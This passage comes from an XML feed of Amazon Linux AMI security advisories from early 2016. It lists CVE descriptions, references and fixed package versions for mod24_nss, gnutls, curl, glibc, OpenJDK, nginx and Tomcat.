</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7974" title="" id="CVE-2015-7974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7977" title="" id="CVE-2015-7977" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7978" title="" id="CVE-2015-7978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7979" title="" id="CVE-2015-7979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8138" title="" id="CVE-2015-8138" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8158" title="" id="CVE-2015-8158" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4953" title="" id="CVE-2016-4953" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntpdate" version="4.2.6p5" release="36.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-36.29.amzn1.x86_64.rpm</filename></package><package name="ntp" version="4.2.6p5" release="36.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-36.29.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.6p5" release="36.29.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-36.29.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="36.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-36.29.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="36.29.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-36.29.amzn1.noarch.rpm</filename></package><package name="ntp" version="4.2.6p5" release="36.29.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-36.29.amzn1.i686.rpm</filename></package><package name="ntpdate" version="4.2.6p5" 
release="36.29.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-36.29.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="36.29.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-36.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-650</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-650: medium priority package update for mod24_nss</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5244:
1259216:
CVE-2015-5244 mod_nss: incorrect ciphersuite parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5244" title="" id="CVE-2015-5244" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_nss" version="1.0.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_nss-1.0.12-1.21.amzn1.x86_64.rpm</filename></package><package name="mod24_nss-debuginfo" version="1.0.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_nss-debuginfo-1.0.12-1.21.amzn1.x86_64.rpm</filename></package><package name="mod24_nss-debuginfo" version="1.0.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_nss-debuginfo-1.0.12-1.21.amzn1.i686.rpm</filename></package><package name="mod24_nss" version="1.0.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_nss-1.0.12-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-651</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-651: medium priority package update for gnutls</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7575:
A flaw was found in the way TLS 1.2 could use the MD5 hash function for signing ServerKeyExchange and Client Authentication packets during a TLS handshake. A man-in-the-middle attacker able to force a TLS connection to use the MD5 hash function could use this flaw to conduct collision attacks to impersonate a TLS server or an authenticated TLS client.
1289841:
CVE-2015-7575 TLS 1.2 Transcript Collision attacks against MD5 in key exchange protocol (SLOTH)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7575" title="" id="CVE-2015-7575" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnutls-guile" version="2.8.5" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-guile-2.8.5-19.15.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-devel-2.8.5-19.15.amzn1.x86_64.rpm</filename></package><package name="gnutls" version="2.8.5" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-2.8.5-19.15.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-debuginfo-2.8.5-19.15.amzn1.x86_64.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="19.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-utils-2.8.5-19.15.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-debuginfo-2.8.5-19.15.amzn1.i686.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-guile-2.8.5-19.15.amzn1.i686.rpm</filename></package><package name="gnutls" version="2.8.5" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-2.8.5-19.15.amzn1.i686.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-utils-2.8.5-19.15.amzn1.i686.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="19.15.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-devel-2.8.5-19.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-652</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-652: low priority package update for curl</title><issued date="2016-02-09 13:30:00" /><updated date="2016-02-09 13:30:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0755:
The ConnectionExists function in lib/url.c in libcurl before 7.47.0 does not properly re-use NTLM-authenticated proxy connections, which might allow remote attackers to authenticate as other users via a request, a similar issue to CVE-2014-0015.
1302263:
CVE-2016-0755 curl: NTLM credentials not-checked for proxy connection re-use
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0755" title="" id="CVE-2016-0755" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl-devel" version="7.40.0" release="8.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.40.0-8.54.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.40.0" release="8.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.40.0-8.54.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="8.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.40.0-8.54.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.40.0" release="8.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.40.0-8.54.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="8.54.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.40.0-8.54.amzn1.i686.rpm</filename></package><package name="curl" version="7.40.0" release="8.54.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.40.0-8.54.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="8.54.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.40.0-8.54.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.40.0" release="8.54.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.40.0-8.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-653</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-653: critical priority package update for glibc</title><issued date="2016-02-16 06:00:00" /><updated date="2016-02-16 06:45:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that 
fix the following vulnerabilities:
CVE-2015-7547:
A stack-based buffer overflow flaw was found in the send_dg() and send_vc() functions, used by getaddrinfo() and other higher-level interfaces of glibc. A remote attacker able to cause an application to call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547" title="" id="CVE-2015-7547" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-devel" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="106.166.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-106.166.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-106.166.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" 
version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-106.166.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-106.166.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-106.166.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-106.166.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-106.166.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-106.166.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-106.166.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="106.166.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-106.166.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-654</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-654: important priority package update for java-1.6.0-openjdk</title><issued date="2016-02-19 15:48:00" /><updated date="2016-02-19 15:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0494:
An integer signedness issue was found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could possibly cause the Java Virtual Machine to execute arbitrary code, allowing an untrusted Java application or applet to bypass Java sandbox restrictions.
CVE-2016-0483:
An out-of-bounds write flaw was found in the JPEG image format decoder in the AWT component in OpenJDK. A specially crafted JPEG image could cause a Java application to crash or, possibly, execute arbitrary code. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions.
CVE-2016-0466:
It was discovered that the JAXP component in OpenJDK did not properly enforce the totalEntitySizeLimit limit. An attacker able to make a Java application process a specially crafted XML file could use this flaw to make the application consume an excessive amount of memory.
CVE-2016-0448:
Multiple flaws were discovered in the Networking and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2016-0402:
Multiple flaws were discovered in the Networking and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0402" title="" id="CVE-2016-0402" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0448" title="" id="CVE-2016-0448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0466" title="" id="CVE-2016-0466" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0483" title="" id="CVE-2016-0483" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0494" title="" id="CVE-2016-0494" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2016:0067.html" title="" id="RHSA-2016:0067" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.38-1.13.10.0.73.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.38-1.13.10.0.73.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.38-1.13.10.0.73.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.38-1.13.10.0.73.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.38-1.13.10.0.73.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.38-1.13.10.0.73.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.38-1.13.10.0.73.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.38-1.13.10.0.73.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.38-1.13.10.0.73.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.38-1.13.10.0.73.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.38-1.13.10.0.73.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.38" release="1.13.10.0.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.38-1.13.10.0.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-655</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-655: medium priority package update for nginx</title><issued date="2016-02-19 15:50:00" /><updated date="2016-02-19 15:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0747:
It was discovered that nginx did not limit recursion when resolving CNAME DNS records. An attacker able to manipulate DNS responses received by nginx could use this flaw to cause a worker process to use an excessive amount of resources if nginx enabled the resolver in its configuration.
1302589:
CVE-2016-0747 nginx: Insufficient limits of CNAME resolution in resolver
CVE-2016-0746:
A use-after-free flaw was found in the way nginx resolved certain CNAME DNS records. An attacker able to manipulate DNS responses received by nginx could use this flaw to cause a worker process to crash or, possibly, execute arbitrary code if nginx enabled the resolver in its configuration.
1302588:
CVE-2016-0746 nginx: use-after-free during CNAME response processing in resolver
CVE-2016-0742:
It was discovered that nginx could perform an out-of-bounds read and dereference an invalid pointer when resolving CNAME DNS records. An attacker able to manipulate DNS responses received by nginx could use this flaw to cause a worker process to crash if nginx enabled the resolver in its configuration.
1302587:
CVE-2016-0742 nginx: invalid pointer dereference in resolver
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0742" title="" id="CVE-2016-0742" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0746" title="" id="CVE-2016-0746" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0747" title="" id="CVE-2016-0747" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx-debuginfo" version="1.8.1" release="1.26.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.8.1-1.26.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.8.1" release="1.26.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.8.1-1.26.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.8.1" release="1.26.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.8.1-1.26.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.8.1" release="1.26.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.8.1-1.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-656</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-656: medium priority package update for tomcat6</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-7810:
It was found that the expression language resolver evaluated expressions within a privileged code section. A malicious web application could use this flaw to bypass security manager protections.
1222573:
CVE-2014-7810 Tomcat/JbossWeb: security manager bypass via EL expressions
CVE-2014-0230:
It was found that Tomcat would keep connections open after processing requests with a large enough request body. A remote attacker could potentially use this flaw to exhaust the pool of available connections and prevent further legitimate connections to the Tomcat server from being made.
1191200:
CVE-2014-0230 tomcat: non-persistent DoS attack by feeding data by aborting an upload
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0230" title="" id="CVE-2014-0230" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7810" title="" id="CVE-2014-7810" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-el-2.1-api" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.44-1.3.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.44-1.3.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.44-1.3.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.44-1.3.amzn1.noarch.rpm</filename></package><package name="tomcat6-admin-webapps" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.44-1.3.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.44-1.3.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.44-1.3.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.44" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.44-1.3.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.44" release="1.3.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.44-1.3.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-657</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-657: medium priority package update for tomcat7</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5346:
Session fixation vulnerability in Apache Tomcat 7.x before 7.0.66, 8.x before 8.0.30, and 9.x before 9.0.0.M2, when different session settings are used for deployments of multiple versions of the same web application, might allow remote attackers to hijack web sessions by leveraging use of a requestedSessionSSL field for an unintended request, related to CoyoteAdapter.java and Request.java.
1311085:
CVE-2015-5346 tomcat: Session fixation
CVE-2015-5174:
Directory traversal vulnerability in RequestUtil.java in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.65, and 8.x before 8.0.27 allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application in a getResource, getResourceAsStream, or getResourcePaths call, as demonstrated by the $CATALINA_BASE/webapps directory.
1265698:
CVE-2015-5174 tomcat: URL Normalization issue
CVE-2014-7810:
It was found that the expression language resolver evaluated expressions within a privileged code section. A malicious web application could use this flaw to bypass security manager protections.
1222573:
CVE-2014-7810 Tomcat/JbossWeb: security manager bypass via EL expressions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7810" title="" id="CVE-2014-7810" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5174" title="" id="CVE-2015-5174" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5346" title="" id="CVE-2015-5346" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-el-2.2-api" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.67" release="1.13.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.67-1.13.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.67" release="1.13.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.67-1.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-658</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-658: medium priority package update for tomcat8</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5345:
The Mapper component in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.67, 8.x before 8.0.30, and 9.x before 9.0.0.M2 processes redirects before considering security constraints and Filters, which allows remote attackers to determine the existence of a directory via a URL that lacks a trailing / (slash) character.
1311089:
CVE-2015-5345 tomcat: directory disclosure
CVE-2015-5174:
Directory traversal vulnerability in RequestUtil.java in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.65, and 8.x before 8.0.27 allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application in a getResource, getResourceAsStream, or getResourcePaths call, as demonstrated by the $CATALINA_BASE/webapps directory.
1265698:
CVE-2015-5174 tomcat: URL Normalization issue
CVE-2014-7810:
It was found that the expression language resolver evaluated expressions within a privileged code section. A malicious web application could use this flaw to bypass security manager protections.
1222573:
CVE-2014-7810 Tomcat/JbossWeb: security manager bypass via EL expressions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7810" title="" id="CVE-2014-7810" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5174" title="" id="CVE-2015-5174" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5345" title="" id="CVE-2015-5345" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.30" release="1.57.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.30-1.57.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.30" release="1.57.amzn1" epoch="0" 
